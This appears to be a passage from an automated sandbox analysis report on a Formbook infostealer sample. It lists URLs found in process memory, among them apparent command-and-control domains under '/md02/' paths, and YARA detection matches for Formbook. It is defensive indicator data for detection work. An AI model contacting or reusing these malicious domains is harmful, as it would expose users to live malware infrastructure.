          Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.teplo-invest.comReferer:
          Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.upcyclecharms.com
          Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.upcyclecharms.com/md02/
          Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.upcyclecharms.com/md02/www.hecxion.xyz
          Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.upcyclecharms.comReferer:
          Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zbbnp.xyz
          Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zbbnp.xyz/md02/
          Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zbbnp.xyz/md02/www.33mgbet.com
          Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zbbnp.xyzReferer:
          Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zruypj169g.top
          Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zruypj169g.top/md02/
          Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zruypj169g.top/md02/www.teplo-invest.com
          Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zruypj169g.topReferer:
          Source: explorer.exe, 00000006.00000003.3075903559.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137896788.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979328846.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
          Source: explorer.exe, 00000006.00000002.4575208679.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2140399407.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000006.00000000.2137414570.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000006.00000000.2137414570.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
          Source: explorer.exe, 00000006.00000002.4566997976.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137414570.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000006.00000000.2137414570.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137414570.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000006.00000002.4566997976.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137414570.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000006.00000002.4564447597.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000006.00000002.4564447597.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
          Source: explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
          Source: explorer.exe, 00000006.00000000.2140399407.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4575546415.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2981043334.000000000C086000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
          Source: explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
          Source: explorer.exe, 00000006.00000000.2140399407.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4575546415.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2981043334.000000000C086000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
          Source: explorer.exe, 00000006.00000002.4575208679.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2140399407.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
          Source: Iifpj4i2kC.exeString found in binary or memory: https://sectigo.com/CPS0
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000002.4566997976.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075903559.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137896788.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979328846.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
          Source: explorer.exe, 00000006.00000000.2140399407.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4575546415.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2981043334.000000000C086000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564447597.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
          Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4578868311.000000000E24E000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
